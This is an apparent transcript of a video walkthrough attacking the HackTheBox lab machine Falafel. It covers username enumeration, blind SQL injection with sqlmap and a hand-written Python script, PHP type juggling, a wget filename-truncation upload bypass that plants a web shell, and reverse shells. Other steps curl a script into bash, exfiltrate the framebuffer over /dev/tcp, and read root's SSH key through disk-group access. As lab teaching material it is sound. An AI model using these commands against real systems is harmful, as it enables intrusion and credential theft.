What's going on YouTube? This is IppSec and we're doing Falafel from HackTheBox, which was a really cool machine because it had its own hint system built in. Meaning, there are things along the way on this box that if you didn't get, you'd still be able to make it to the next path, but if you went too far down a rabbit hole, it kind of guides you along the right way and gets you out of that rabbit hole. For instance, in the root of the web directory, there was a file called cyberlaw.txt. Most people won't include .txt in their dir busting, but if you did, you get rewarded by it telling you, hey, the username you should play with is Chris. And if you didn't get that hint, well, if you play with the login thing, you may notice that it gives you a different error message based upon if you have a valid username or not. So you could have just brute forced that username. And then once you log in as Chris, it kind of tells you, hey, you should do some PHP type juggling. Go Google that. If you don't, well, you may just go down a rabbit hole forever with SQL Injection. So I really like those ideas of hints to keep you going too deep in a rabbit hole and just guide you along the path the box should be taken. In addition, there weren't really any unintentional ways to solve the box. He did a really good job at making a box vulnerable, but not too vulnerable, and that is actually really tough to do. So, with that being said, let's jump in. First, let's run the nmap with the flags sc for default scripts, sv, enumerate version, oa, output all formats, put in the nmap directory and call it initial, then the IP address of Falafel, which is 10.10.10.73. Does take some time, so I've already ran it. Looking at the results, we see two ports are open. SSH is listening on port 22 and Apache is listening on port 80. Both of these are exposing their version numbers, so we could just Google, let's see, Apache 2418 Ubuntu and get what distribution this is running by going to, I think, packages.ubuntu.com. Yeah, so we see it is running Xennial. And if you looked at Trusty, you can see this is, I think, 247, and Artful is 2427. So we know this is probably Ubuntu Xennial, and doesn't really help us outside of just having that knowledge. If it was a unsupported distro, then that could lead to things like shell shock and other things. But let's just go to the Falafel webpage and see what is in store for us. We see an email address, it@falafel.htb. So maybe it is a username, or maybe there's something with mail. Didn't see any ports open, so I doubt that. Clicking on login, we do get a login prompt. So the very first thing I'm going to try is the standard SQL injection, which is single quote or 1 equals 1. So let's do admin and set that for the password, and we just get wrong identification admin. Trying something else, let's do IppSec and put something for the password. We get try again. So right off the bat, we have a way to enumerate usernames. So let us do two different things for Recon. You didn't have to do these to complete the box, but they are there to provide hints, which is my favorite thing. The very first thing we're going to do is a GoBuster. So we're going to do opt GoBuster GoBuster-H, and this goes along the lines of always have some type of recon going in the background. And I'm doing two different recons because these are the first two things I normally do when coming across a site. So let's do GoBuster with the word list, user share word list, dirbuster, directory list, 2.3 medium. We'll do the, let's see, extensions txt and php, because going to the site, we see it as a PHP website. We could also do things like .swap and other things to try to find hidden files if someone was using VI in that directory, but not doing that for this. Let's see, what else do we want to do? We need the -u for specifying a URL to run it against, which is 10.10.10.73, and then we'll do -o to write the results, and we'll call this dirbuster.log. And let's do a vertical split and do wfuzz as well, because we want to enumerate the users on this box, since this little Boolean thing changed. So let's create a good request, admin password, and send this over to burp, turn intercept on, submit, and we can see it is a post request to login.php with the parameters username and password. So to make this easy, I'm going to copy something out of user share word list seclist. Then we can go to usernames, names, names.text. And this isn't on Kali by default. I put it here. If you just Google like GitHub seclist, you can download it. So what I'm going to do with this is use wfuzz. If we do wfuzz-h and then just wfuzz, we get some examples of how to use it. The -c stands for -color, so I'm definitely going to want to do that. -z is payload, and in this case it is doing file users.txt. So it's going to go through all of the lines in that file. Then we have -sc, which is up here, show responses with the specified code, so they're only showing things with 200, and then the actual URL. If you do -d for post data, which is what we're going to have to do, because if you looked at the request, it was a post request. So let's run this. wfuzz-c for color, -z file names.txt, -- we'll do sc as well, 200, http 10.10.10.73, login.php, and we also have to do the -d for data. So put it in quotes, username is equal to fuzz, and whenever wfuzz sees fuzz in all caps, it knows to pull it from the file. Then we can do and password equals please subscribe, because the password doesn't matter in this case. When we run it, we get a bunch of responses, so I'm immediately going to cancel that, do wfuzz -h, and 7,000, let's do this quickly. Crap. I know what I want to do. -h, we'll copy this line, then run this again, and we can paste the line. So we want to do not sc, because that's always 200, -sl, the length, -sw, the width, or -sh, 4 characters. I'm going to do, I got the wrong one. This is show. Hide is, instead of s, do h. So I'm going to change that -sc to be hw. So hide words, and we're going to specify 657. So now we have wfuzz running, and it's only going to show us responses that are not 657 words. Right off the bat, we got admin, and we also get Chris. So we have two different valid users. Going back to a GoBuster, we have interesting page, robots to text, and cyber law. So let's check both of those out. Box is going a little bit slow. Maybe that wfuzz is slowing me down. That is obnoxiously slow. I'm going to kill that, because those are the only two things we wanted, and not sure why Kali is going super slow. There we go. That sped things up. So let's turn intercept off, go back to Firefox, and let's check robots.txt. Nothing there. We can do cyberlaw.txt, and we can see a message that says a user named Chris. So that's how we could have also got the Chris name if we didn't want to brute force it. Has informed me they could log in my account without knowing the password, then take full control of the website using the image upload feature. So now we know there's probably going to be an exploit and some type of image upload, and they can log in an account without knowing the password. And yeah, that is about it. So let's try logging in with Chris and just common passwords. So let's see. Log in. Let's do like Chris password. Don't get anything. Admin password. And just trying default things. You could set this up to go to Hydra. And if you just YouTube IppSec Hydra, you'll find an example of how to do that. We're not going to be doing that. We're going to play with different SQL injections. So In the spirit of always running Recon in the background, we're going to exit wfuzz and run SQLMap. So let's go back to a repeater. We did not record that. So try to log in. Forgot to set intercept on. Submit this. Go into burp. Send this to repeater. Highlight. Copy the file. And we can do login.request. What that allows us to do now is just do SQLMap -r login.request. We can do level 3 risk 5 and -p. We want to do the usernames parameter and password parameter. It was usernames, right? Username. And I got these backed up. Risk 3, level 5, and we'll also add, I think it's --batch so it doesn't ask us any questions. So let that go in the background. We'll label this window now SQLMap. And while that goes, let us try our own. So if we do admin single quote, let's turn this to never remember. And again, burp, intercept, off. SQLMap's not showing anything. Wrong identification. Admin. That was weird. Single quote didn't change anything. Nope, it did. It was just burping, intercepting. So if we do admin single quote and then a comment, and we still get wrong identification. So it looks like there's some type of SQL injection here. So if we do admin, so we'll do union select 1 and then a comment. We get hacking attempt detected. So we can't do union statements. We could try doing like a comment here and then fuzzing it. We just get try again. And we could go up to a few to see if we can get union injections working. I think you could do %0b as well instead of these comments. But that doesn't work. This is immune to that. So all we know is there is some type of Boolean injection with this SQL. And I'm going to let SQLMap finish so you can see without specifying the Boolean thing, SQLMap will miss this. So we'll just let this finish. So SQLMap finished and it found absolutely nothing. So let's go back to the logic. If we do admin and then the dashes, we get the wrong identification. So I'm going to copy wrong identification. Whoops. Go back to our SQLMap. Let's look at login.request. The username is admin, so that is crucial. And we're going to just do --string and then do wrong identification. And this is going to tell burp on successful inject, the page is going to say wrong identification. So now it can complete its Boolean logic and determine what's good and what's bad. And to speed this up, I'm just going to do dbms MySQL because it's a MySQL database and we don't want to run checks for everything. So running this, and we can see it should find it relatively quickly. And what this is going to do, there we go, it did find it. So it's doing essentially username's admin and password is like, and then something. So that's kind of what the query looks like. And then you just filter it based upon the very first character. And at the end of the video, I'll probably go by and do this manually so you can see exactly what happens. But for the sake of time up front, we're just going to use SQLMap. So SQLMap found the vulnerability, so we're just going to do --dump, and it's going to retrieve everything one character at a time. You can see username, password, role, so it just dumped the table, and now it is dumping the password. So this is for ID number 1, and that is the admin. He is the admin role. And ID number 2 has a different hash. And he's a normal account, that is Chris. and it's now attempting to crack the hashes. And notice it's not asking, like, prompting us for anything. That's automatically going. Like, do you want to do the dictionary-based attack? It says yes. Do you want to do common password suffixes? It auto defaults to no. That's because I did the batch option. So let this go a little bit quicker. And the batch just means always choose what is default. Should come back with the result anytime now. There we go. We got cracked password juggling for Chris. So let's try logging in while it keeps trying to crack root's password. So if we do Chris, log in with juggling, login successful, and we are going to a new page that just says Chris, juggler by day, hacker by night. And there's a lot of references to juggling. So this is PHP type juggling. So the very first thing I did when I saw this was I went to repeater and tried like making username a array. And then we go down and we just get invalid username and password. So I ditched that and then went back to the hash for admin and notice it was 0e. And when PHP sees 0e, it converts that into a number because it thinks 0 exponent. So that 0e whatever is being treated as 0 to the whatever power, which is always going to equal 0. So as long as we can find a collision that begins with 0e, it's going to work. And that works only if the PHP code is like num is double equal to 0e whatever. PHP has a triple equals that makes it so you can't do type juggling. So if it's triple equals to this, it's not going to treat that right side or left side as a integer or a number and treat it as a string. So let us just Google for like PHP 0e hash collision, because we're just looking for any MD5 hash that begins with 0e. Go to this Hacker News thing, and once this loads, we'll see if this has a page. There we go. So we got echo-n240. So let's go to this, log out, log in with admin with that hash or that password. We get login successful, and we go to a page. And just to verify that is because of the juggling, we're going to do a different one. We'll do this bottom one. We can do admin and then paste this, and we get login successful. And you may have done this without doing the type confusion because once a box is live for so long, people are going to post stuff about it online. If you just Googled the hash, you would have got the password is King of Falafel. So that is what people are doing the hash collision against. King of Falafel was, I think, the actual intended password for that user. Maybe just a huge crack got that one. So we'll lead, once logging in, we go to this upload via URL page. So it's telling us, hey, specify the URL of an image to upload. So my very first thing to do is set up netcat. This is no longer SQLMap. We'll just say bash and do listen on port 80. Go to this page and make it connect back to us. And my IP is 10.10.14.30. And clicking upload. Maybe I'm not 1430. Oh, bad extension. We need a image file. So we'll do http 10.10.14.30/IppSec.gif. Going back to our terminal, we see Wget 17.1. So when I see this, I do search exploit wget, and this is going to be a little bit of spoiler. This actually won't work. I'm not sure why. That wget version should be vulnerable. I'm guessing the distro had patched it and didn't update something, like the version information, because this certainly should have worked. So if we look at this exploit, let's just make the directory wget, I guess. And then search exploit -m to mirror this and copy that text. This is very much like, I forget what box it is. There was a box where Wget was used as a Privesc. If you just YouTube for IppSec Wget, you'll probably find it. Let's see. So what happens is Wget follows redirects. So if you do a Wget against a page, it redirects you to something else. Wget will follow that and download that content. There was a bug where if it redirected you to an FTP page, it could actually serve you a different file name. So what we're trying to do is trick this into having a URL that ends in .gif and download a actual .php file. So this proof of concept actually led to code execution because they were writing it into the root directory. If we go back here, we can see we have to view source, go to the bottom. We can see just before it, it's changing the directory, then doing a wget, so it may not work that way. And then I had also, not to go through 100 different tangents, but I also tried things like -o http 10.10.14.30 upload .ipsec.gif, and that -o is output file, so we'll do ipsec.php, and it requires it to be a URL, and it also requires it on the server side. So I don't think it's vulnerable that way. Proof of concept exploit. Let's see. That is just creating the initial file to download. Here we go. We want to start copying this. Why won't it scroll down? That's odd. Copy. Select. I guess it won't go down when I'm in VI. So let's just cat that. Then go up to where we were. Let's see. To the Python code. Select. Copy it down to the very end. Hit enter. Then we can do exploit.py. Set paste. Paste it in. And we just have to edit this a little bit to work because it's trying to create a wget rc file. So let's do right here on this do get, and it's redirecting to anonymous.wget rc. We don't want that. We want to download the file ipsec.php. Redirect to the new location. That should be fine. The post request, we're not actually doing anything. This is for when it actually tries to get the code execution. HTTP listen port, IP. Let's change this to 10.10.14.30. This to 10.10.14.30. Root drawn. And we need FTP. So let's just grep that thing for, I think it's PyFTP for a quick FTP server. And we'll have to create the file ipsec.php. And I'll just echo, please subscribe. And I'm doing echo first because if PHP safe mode or something is on, I'm just doing a super simple PHP thing to tell if it works before I jump to the unsafe functions like code execution. So start the FTP server. Then we want to start the web exploit. We have to go into the wget directory. Start that. And if we wanted to, we could test it out. If we do wget localhost ASD, we get connection failed because, I don't know, wget 10, 10, 14, 30. Maybe I don't have localhost in my Etsy host file again. There we go. And we can see the request redirected us to FTP to download IppSec.php, logged in, downloaded the file, but still saved it as ASD because my wget version is patched. If we had done, I think it's trust server name, is that it? There we go. That is the argument if you wanted to still trust whatever the server gives you, and it now saves IppSec.php. But let's remove those and then run it against the actual box and see what happens. We can just upload this again. We see it served the file, and FTP attempted to host it. So going to this output, go to the bottom, we can see it retrieved IppSec.php, but still saved it as IppSec.gif. And if we go to uploads, whatever, let's see what we see. IppSec.gif. We get to that file. So nothing too interesting there. And we can't get to uploads either. So at this point, you should go back and poke around at other things. If you click on the profiles for admin, you would have seen a hint that says know your limits. So that is hinting at wget has a maximum character length. So what I did was Googled max character length Linux. I forgot file name. But we get Linux has a maximum file length of 255 characters. So what I did, let's kill this wget stuff. Was do a pattern create for 255 characters. So we'll locate pattern create and just paste this dash length 255 I think was the max characters. Is that what it said? Yep, 255. So copy this. We'll make a new directory called dub, since we're no longer doing that Wget Exploit, and then touch that vi edit IppSec was here, and then Python simple HTTP server 80. Actually, we need to do .gif. It has to be ending in an image. So we'll 1, 2, 3, 4 .gif. Crap. Need two file names. There we go. So now we have this long file that ends in .gif. Do this. And I suppose if we wanted to, we could even, if we do a file against that, it thinks it's ASCII, so if we add the magic byte for a GIF, when's that working? VI. Huh, tab autocomplete's not working on that file. That is bizarre. But add GIF 8. That is the magic bytes. Works for file. Maybe you can't VI a .gif, and that's why it's not. Now file thinks it's a GIF. So if there was that type of check in this application, we would bypass it. And we would start the web server. Go back to Falafel, upload. Paste that, and put the URL as 10, 10, 14, 30. Upload. We see it downloaded the file, and if we look at the results, we see the name is too long, 255 characters total, trying to shorten. So, new name, let's see what this is. This is the new name. Notice it got rid of that .gif. And we can do echo-n to make sure it echoes without the line break because that gives us an extra character. then WC-C to count the characters, we see 236. So everything after 236 characters just got cut off. So what we can do is take this, or we can just do python-c print a times 232, because we want to include an extension, which will be .php. Copy this, and then vi that .php.gif, and then do a shell. So cat op shell php, we'll do cmd.php, copy, paste, save, it did, Python m simple http server. So what's happening here is all this up to here is 236 characters, and that is the maximum length wget's going to take, and it's going to cut off everything after that, which is the .gif. And the application, when it sees that string, is going to see it ends in .gif and pass the check. So let's test this out. If we go back, we can put the URL as http 10.10.14.30/ that long file name, upload it, Control U, so we can see the source, and we can see saving to, let's see what the new file name is, alla's.php. So if we go into upload / this directory, let's get rid of, we can leave view source, it's fine. Go into that directory and then paste the file name of alla's.php. We get the file does exist, and we can do a command like who am I, or we have to do ip equals who am I, and we get dub data. So there we go, we got the code execution. So now let's send this over into burp so we can easily manipulate what commands we send. So turn intercept on, refresh the page, send to repeater, and then let's convert this into a post request, because post requests have less URL filtering things you have to worry about. So let's change request method and go to reverse shell cheat sheet to find a shell. Before we do that, turn intercept off. Pentest monkey reverse shell cheat sheet. And try this very first one first. Go on repeater. I think I just pasted it twice. There we go. 10.10.14.30. We'll do it on port 9000. NCLVNP 9000 to listen. Click go. 200 OK. We didn't get anything. Let's do URL encoding with Control U. Go. Immediately get something back. Nothing there. So let's move down the list and try a different reverse shell. Normally when that fails, I try netcat. And before we do that, we can just do which and see. It does exist. So paste this in 10.10.14.30 9000. Control U to encode it. Click go. Nothing immediately back, because if we look, we have a shell. If we do hostname, we have falafel. So let's do python c import pty, pty.spawn bin bash. Python's not found, so python 3-c and copy and paste. There we go. And then let's make it so we have tab autocomplete by backgrounding with Control Z, stty raw minus echo, fg. There we go. And if we do clear or anything, it doesn't work because the term environment's not set. So we'll do export term is equal to, we'll say screen, and now we can clean up the screen a bit. The first thing I want to do is run Linux Priv checker, so let's copy that. So cp opt linux, we'll do linenum.sh, just because it doesn't have Python 2, and the copy of Linux Priv checker I have is Python 2, not Python 3, and errors out. So doing with linenum, and then we can host that, and then we can just curl 10, 10, 14, 30 slash linenum.sh, pipe it over to bash. There we go. And while that runs, let us grab Linux Priv checker, or not Linux Exploit suggester. That's what I wanted to say. And I normally grab a new copy every time I do it because, well, updates happen frequently to these type of scripts. So Linux Exploit suggester. So I never want to use what's on my hard drive just in case an update came. And there was Linux Exploit suggester 2. I haven't seen that one before. What are you? Let us see real quick. I bet this is Python. Perl, get away. I don't feel like dealing with Perl. So, very first thing I always do is click on the forks and see if there's any more up-to-date ones. And it looks like there is. There is this C. Morris, who has been committing quite a bit. And this guy has a more recent commit, but it don't impress me much because, well, I like seeing commitment, and C. Morris definitely has more updates. So we'll do this because it looks like he's adding things as he goes. So we switch to his repo, click back here, and now we can just do a git clone. And let's see, we cd in here. I hope we can just run this bash script and don't need everything. File less, what is that? Less is other stuff. Let's just copy this and hope for the best. Looks like this guy made it a little more complicated. So that scan is complete. We can do the same thing with Linux exploit suggester.sh. Forgot to pipe it to bash. And while that runs, let's go to the very top and look through our lin enum.sh. So these are two different privilege checker ones. We see it is running Ubuntu Xenial. We had known that already. Users, we have Yossi is logged in, and he's logged into a physical terminal, TTY1. We can see Mosh, I don't know what that is logged into the sudo terminal, but someone's logged in physically to this box. Users on this box, sample entries, permissions, home directory contents, HTML is one because of www data, I think. Root is allowed to log into this box. Available shells, not interesting. Nothing too interesting in cron tab. Looking at it's not really talking to anything. We can see TCP and MySQL as listening ports. Look at SUID files. It looks like nothing is out of the ordinary. Only root can read the password file, so we're not coming up with a whole lot of things here. And that is the contents of exploit suggester. So I'm going to do Linux exploit. So let's see. It is telling us that it is vulnerable to this CVE. It looks like it's saying a lot of CVEs it's vulnerable to, so maybe we needed to copy all the scripts. But this 2018 CVE is interesting since I think this box was released in 2017. If we do a uname-r, or we'll do uname-a, and pull up this kernel's build, copy, paste this in, paste that in, copied freaking HTTP. Let's see. Do that with Ubuntu. Linux image. This is probably it. When was this released? Does this have a release date? It doesn't. But if you got a release date and you saw it was before this, then you can assume it is vulnerable to this CVE. So let's just copy this and add it to notes. So we'll come back to that again at the end of the video because that isn't the intended way to Privesc. The intended way is we got to find a way onto a different user. So we are www data. If we do ID, that shows us that. So whenever you get on a web application, the first thing I generally do is go and look at the SQL password. So I'm going to guess the SQL password may be in connection.php. And we see it's logging in to the SQL Server 3306 as Mosh with the password Falafel is really tasty. So we could just su mosh dash and do that and log in that way. But since we're not on a real terminal, I'm just going to try to SSH straight as him. So mosh at 10.10.10.73. Set the password. There we go. So we can get out of this web shell. It doesn't look like it wants to exit. So we'll just ignore that. We can kill that pane and not close it cleanly. And now we could get that user.txt file. So if we do wc-c user.txt, we can see it is 33 characters because there's a line break in there which makes it that extra character. I'm going to type bash, so now I have that tab auto-completion. It is really annoying not having that. And we could run lin priv checker again. I'm going to run just ID. And looking at it, we have a weird group we're part of, video. And I say that's weird because normally don't see that, and it does signify that you can read the monitor output. And we saw that the Yossi user was logged in physically to the box with the TTY. So generally won't happen in HackTheBox machines because, well, it's physical. You'd have to pull up the KVM. So it looks like there's some type of auto login or that user's doing something physically on the box. So let's dump his monitor. It's actually a device and /dev. I think it's FB. I forget what FB stands for, but there we go. So if we open a new window, we can do nc lvnp. We'll listen on port 9000 again and say this is going to be fb.raw. And then we can cat dev fb and pipe it to dev tcp 10.10.14.30 and then the port 9000. So we're sending the contents of dev fb 0 to a netcat session, and then a netcat session is going to direct it to a file and save it. So there we go. It saved that file. If we do file on fb.raw, we can see it's a target image data. So let us try to open this with GIMP. GIMP. And there's probably other applications to open it with. I'm just using what I know. And we can do documents, HTTP, boxes, falafel. And it's not here. We have to select the file type and say it is a raw image data. And instead of all images, change it to all and do fp.raw. When we open this, we get a bunch of garbage. And we can try changing it to all different sorts of things, and it doesn't work. And that is because it's doesn't have the resolution correct. So on this, we have to cat the sys class. I don't know what it is here. So let's do cd/sys find dot and grep for fb0. Is it sys class graphics? Let's see. Devices. Could be devices. Name, power, dev, pan mode. Yeah, I think that's in devices. So cd devices PCI 000. Let's just copy this. I'm sure it's symlink somewhere. Maybe it's in symlink to graphics. Maybe that's why it shows that. Sys class graphics cd. Yeah, it's linked here. So a quicker way to type it. You could have just copied and pasted that long string or done this. I think if we can verify that by ls-la. I won't worry about it. Yeah, we can see the symlink here, that it is going to that. So if we go to fb0 and list the different things, let's see. We got bits per pixel. Let's see what that is. That is set to 32. We got mode. What is mode? Blank. Virtual size. We can see 1176 by 885. This is the actual resolution. So if we go back to that GIMP, we can say 1176, and we want 885. And this offset, if we do 32, does anything happen? Not really. Let's just do 1. And open. We can see the actual contents of the monitor. And he's trying to set the password to Moshe, please stop hacking me, ! And user doesn't exist, and then he changes the password. So we can assume that Yossi's password is that Moshe, please stop hacking me. So let's su Yossi, Moshe, please stop hacking me, ! And we can log in. So I'm going to close this out because I like everything to be clean. And we're going to open up a new thing. So this will be Moshe, and open a new SSH as Yossi at 10.10.10.73. Put the password. Okay. ls-la, there's a bash history, so let's check that out. Oh, it's 0 bytes. No point in checking it out. Exit that, so it's now actually him. So let's see, what can we do here? If we do ID, we can look at what is different here, and we see that this user is a member of the disk group. And the disk group actually owns the hard drive. So you could strings dev sda1 grep root.txt, and it would eventually find it. Maybe it's SDA5. It's one of these disks. There we go. It's finding some stuff. But that could take a while. So there's also a program called FSDebug, I think. What is it? Locate dash debug. That's not what I wanted. Shoot. What is it? Debug fs. There we go. And then we can do dev sda1. When we do ls in here, we can see different directories. So we do q to exit that. We can go into root, do ls, and we can see root.txt. We also see .ssh. So I'm going to go into .ssh and then do another ls and see that there is a authorized key file and id underscore rsa. So I'm going to grab that and we're going to cat id rsa, grab this file, name this guy Yossi, and then a new one, and create root.key, paste the IDRSA file, chmod that to 600, and then we can ssh-i root.key root at 10.10.10.73, and we are now root on Falafel. If we do wc-c on root.txt, we see it is 33 characters, and of course, one of those is a line break, so that is the MD5 hash. So that is the way to do this box. If you wanted to, you go all the way back and let's get the shell on port 9000 again, and let's do the kernel exploit. So Python m simple HTTP server 80, we already have that, nclvnp 9000, go to bash, replay this, got the shell, Python 3, let's get a proper PTY, okay, so let's do temp, and let us download or do that actual exploit. So if we do cat notes, we see CVE 2018-1001. So let's search exploit. Can we look for that? We sure can't. So let's Google that, POC, and we get one here. So let's just go to the top result first and try this out. RationalLove. Go to raw. We could clone it or just copy and paste. V RationalLove.c. Set paste. Paste it in. Go to the top and let's see if there's any compile instructions. Doesn't look like it, just -o to say an output name. So let's try this. We can just do gcc-o RationalLove and then specify the file. Did not find it. I think I have to be in dub. Is that where I put it? That's not where I put it. Oh, I didn't do it since I pasted it. Crap. Let's go back here. Copy everything. That's why it asked me to save. I thought I had just downloaded it. It's not it. Paste. I didn't do set paste. There we go. gcc-o RationalLove RationalLove.c. Looks like it compiled just fine, so let's move that into dub. And then we can go to a shell, -o RationalLove 10.10.14.30 RationalLove. ls, looks like it copied, chmod plus x, and then execute it. And it's attempting to gain root. See if it does. Escalation failed. see if we can do something to make this work. Maybe it needs that PID flag. So let's see what it was talking about with PID. You may also try the PID parameter if you want to test the program on an existing namespace or chrooted mounts. Not sure exactly how to find the namespace or whatever mount. psef grep root. I should have done chroot. psef grep chroot. Is that running anywhere? No. We can do RationalLove PID 6789, I guess. That'll be. Let's not do that one. Let's do 6825 6787. See if that works. Nope. Let's just try this again. See, it wants us to be this to have 1. I guess once this finishes. Should have been vulnerable. Let's cat this. That is set to 1. Let us look back at this exploit. Let's see. We don't need that. Get rid of that. Let's see. Ubuntu Xennial 16043 cat etc lsb release 16043 libc version 2230 Ubuntu 9 LDD version. I wonder if that Ubuntu 10 is throwing it off. Maybe we don't have the correct offset. Let's see. I have no idea what it's doing. Linux Mint has 1 less A. Let's see. And Debian stretch. Yeah, I actually have no idea how this exploit is working, but certainly is not working for us, so let us try, I guess, doing it with Metasploit. Maybe Metasploit has a better offset for us. So, let us, we can probably just MSF console. Actually, let's start Postgres. Service PostgreSQL start. Well, that works. Whoops. I keep splitting the wrong way. Let's see, MSF console. Then we can do MSF Venom grep for Linux. And we want to do --list. One of these will finish first, and then we'll begin setting up the handler. Okay, use exploit multi-handler, set L host to ton 0, set L port to, let's do 9010, search, there we go. Let's see, we want Linux, probably x64 if we have it. There we go. x64 interpreter, let's do this one. MSF Venom -p, lhost equals 10.10.14.30, lport equals 90.10, -f elf -o, call this interpreter, I guess. Set payload, it's equal to that. I had search, whoops. Set. Show options, verify it's all there. Looks good. Start the handler. Base64, encode this to quickly send it. V. We'll just do met. Paste. Base64-D. Met chmod plus x. And now we got a interpreter session. I should have made sure we had the payload for this first. Let's do search RationalLove, rational. I do not have RationalLove on my Metasploit. That is awesome. RationalLove Metasploit. Could have swore there was a module for this. Rapid 7. Source code. glibc real path Privesc. That's what I want. Search glibc real. Do I not have that? Wonder how old my Metasploit is. Locate. Yep, certainly do not have that. Let's see. Let's go to opt. We will just re-download Metasploit. Thought I did an update on my Kali more recently than, 3 days ago. Git clone. One can hope that it's just not in the apt repository yet. So once this git finishes, hopefully we can just MSF console within this. I normally don't run this off of Git, so we'll find out. Okay, we have downloaded it, so let's go into it. We can find let's grep for glibc real. Okay, we definitely have it. Execute MSF console. Bundle install. Let's update everything. Hopefully this doesn't screw over my whole Kali. Never know. It probably just killed my existing Metasploit. Well, this is awkward. The gem bundle install failed. Can we do MSF console and hope for the best? If not, I guess we'll blindly run this next command. Nope. Gem install fails. Can we go back and still run MSF console? Yep. Looks like we still do Metasploit. So let's see. Let's locate where MSF console is. Probably in user bin, unfortunately. Okay, where does Kali install Metasploit? Locate Metasploit. Let's see. We'll do locate exploits Windows. User share. Let's grep-v exploit db because that's all searchploit stuff. So we can probably copy out of user share Metasploit framework, and we'll delete modules, plugins, and scripts and hope for the best. Scripts. I think those are we'll do data as well. And then we will copy out of opt Metasploit, and you should probably never do this. No idea what's going to happen. So we'll copy modules, we'll copy plugins, we'll copy scripts, and we'll copy data. MSF console. And oh man, we got a lot of errors for, I guess, OSX stuff. I guess it's only OSX, so it doesn't bother us, hopefully. So exploit multi-handler, lhost, lport, payload, exploit run interpreter, and search glibc real. Cache hasn't been built yet. I guess that's a good sign. It is searching for that module. And we now have the module. So let us use this and I guess hope for the best. Show options. Set. Do we have compile? I guess we can just leave everything to default first. Set session to 1. Run. And let's see what happens. Exploit failed. Failed to validate session. Show options. Session is 1. Sessions is 2. I wonder why that's that. Run. God darn it. We have to set lhost ton 0. Do it twice for good measure. And we started the handler, writing the exploit and launching it. And it doesn't look like it worked. I'm assuming we would have got a call back, like near immediately. Exploit completed, but no session created. Is there anything in advanced options? Doesn't look like it. So I just screwed up my Metasploit for almost no reason at all, since this did not work. What if I set compile to false if it pre-compiles it? Because I don't think this box had GDB. Or GCC. Set compile false. Run. Is anything different going to happen? Nope. So I'm not exactly sure why this box isn't vulnerable. I'm guessing it's some weird offset thing. Maybe I'll come back to it if I find out before I release this video, but we're going to ignore all of that, I guess. Sorry. I guess exploits don't always work, and as I say in almost every video, I should do more time prepping to make sure all this stuff works before I start playing around, but oh well. Let's just create a new window and start with the Python stuff. So make the directory Python, and we're going to go back to the SQL injection and do this manually. Okay, so let's do this. The first thing we have to do is actually reinvestigate this SQL injection so we can understand it. So I'm going to go to the login tab in my repeater, and we're going to do the SQL injection. If you remember, we did admin. We can see this size is 7,393 bytes, and that just says wrong identification admin. And if we put something else, like my name, IppSec, we're going to see 7,376 bytes, and that says try again. So whenever we see 93 here, we know the query was a success. I just don't feel like scrolling all the way down every single time. So go back to admin, 7,393, so that's good. Then I'm going to add a single quote, and we get 7,376 because we don't have a comment. The SQL query failed. It was like select star from users where username equals admin and password equals, I have admin here as well. So these are probably in single quotes. And what we did was we injected an admin and added a single quote, which creates a unequal number of quotes. So when we add the comment, it erases all of this, and that becomes a valid SQL query. So we're going to do exactly that. And we can see it's back to 7,393 bytes. So now we have to do, and password is like, and if we did star like we did earlier, it's an error message. 376, because star is not the wild character in SQL, percent is 93. So we're good there. And then if we did 0, because we know the admin begins with 0, we still get 93. Now the next character is E. If we didn't put E and put A, we get the error message, 7,376 bytes. If we do E, we get 7,393. So we can also do a substring command, so sub str, and that's going to pull a character by character out of password. So substring password, we want to pull the very first character, and then the next thing is how many characters. So if we did 1 here, we're only going to pull the very first character. And we can change that like to be an equal. So the very first character of password and only grab the first, that's what that second one means. And we get 7,393. If we change it to be the second character and only grab one character, it's going to fail, 376. If this O was an E, it's going to pass. So that is the logic behind this SQL injection. So let's go over to a Python script and create SQL inject.py. And the first thing we're going to do is import the request module. This allows us to easily create a Python request. And we're going to do chars is equal to, we can just do 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, then A, B, C, D, E, F. Those are the valid ones in a MD5 sum. It's just hex characters. And then if we do for C in chars and print C, and we do Python 3 SQL inject, we're looping through every character. We also want to do a function. We'll do def get SQL, I for index, C for the character, and we're going to return admin, then single quote, and substring password, %s, this can be the very first variable, and that's going to be the index, 1, because we only want to get one character, equals %s, and then a comment. And then we do a %i, c, and that means the I is going to go into the very first %s right here, and the C is going to go into the second %s right there. So we can do now for C and chars, let's do print get SQL. We'll just get the first character every time, and C. And we have to close out that print, Python 3, and we can see the SQL injection trying every single character. So now we have to create the actual request. So we're going to do for I in range 0, 32. And if we print I here, I forgot Python 3. We go 0 to 32. We actually don't want that. We want 1 because the very first character is going to be 1. So from this, now we can do for C and chars. So what this is going to do is loop over every character in the password, then loop over every character in our list. And I'm using tabs. Oh well. Spaces I should have used, but tabs will work. Injection is equal to get SQL IC. So this is going to just create a variable so it's easier to read. And that's going to create this as a string. Then we can do payload is equal to, and we have to create this as a dictionary. I think that's the correct term, because that's just what a request module wants for a post request. So the username parameter is going to be equal to injection, and then the password parameter can be equal to anything. We'll do please subscribe to keep it like, well, we always do. And I'm going to keep using the same quotes. I don't know why I changed them there. Okay. Then we can do for the request module equals request.post http 10.10.10.73 Falafel's IP address login.php, and then data to make this a post request is equal to payload. Okay. Then we can do if wrong identification in r.text, print the character, and we'll just do that for now so we can see exactly what it looks like and make sure it works. Request has no attribute posts. It's post. There we go. 0 E4. So that's working. It's printing one at a time. And this is why I like Python 3, because we can just do end is equal to that, which is nothing, and then flush is equal to true. So now when we run this, it just puts it out on one line, and then we can go and optimize this a little bit and break after the very first match, because this is looping all the characters, and once it hits a successful character, it's going to continue the loop. Putting this break here is going to make it exit the first loop and then just go to the next character. And then after this, we can print a break line, and let's go. That did not work. C, comma, and that should have worked. Let's see. It's probably got some type of line break by default when it does a loop this way. So we're just going to make this a list by default. No comma here. Okay, let's see if this works. Finding it like this. I could have swore you did. I'm actually not exactly sure what's going on. This is a little weird. -1. Does that chop off the last? Nope. Is it like ends with? Let's see. Python 3, don't print new line. How to print without new line or space. I wonder if this print, this print's in the wrong spot. I'm an idiot. There we go. 0 E4. And you can see it's going a little bit faster with that break. And that gets the administrator's hash. We can copy this and just do echo-n, paste this, wc-c, 31. So we have to create this loop to be 33. And now we'll get that last character to make it 32 characters, which is an MD5 hash. So this is how the SQL injection is working. And if you wanted to, I'm not going to actually code this, but I'll show you a small trick to make this a little bit faster, and it's up to you if you want to do the coding. We could also, see, the easiest way to explain this, we'll just do it. So if we do ord to convert this into an ordinal number, and the very first one, let's see, is going to be 1, which is 0. This isn't going to work. 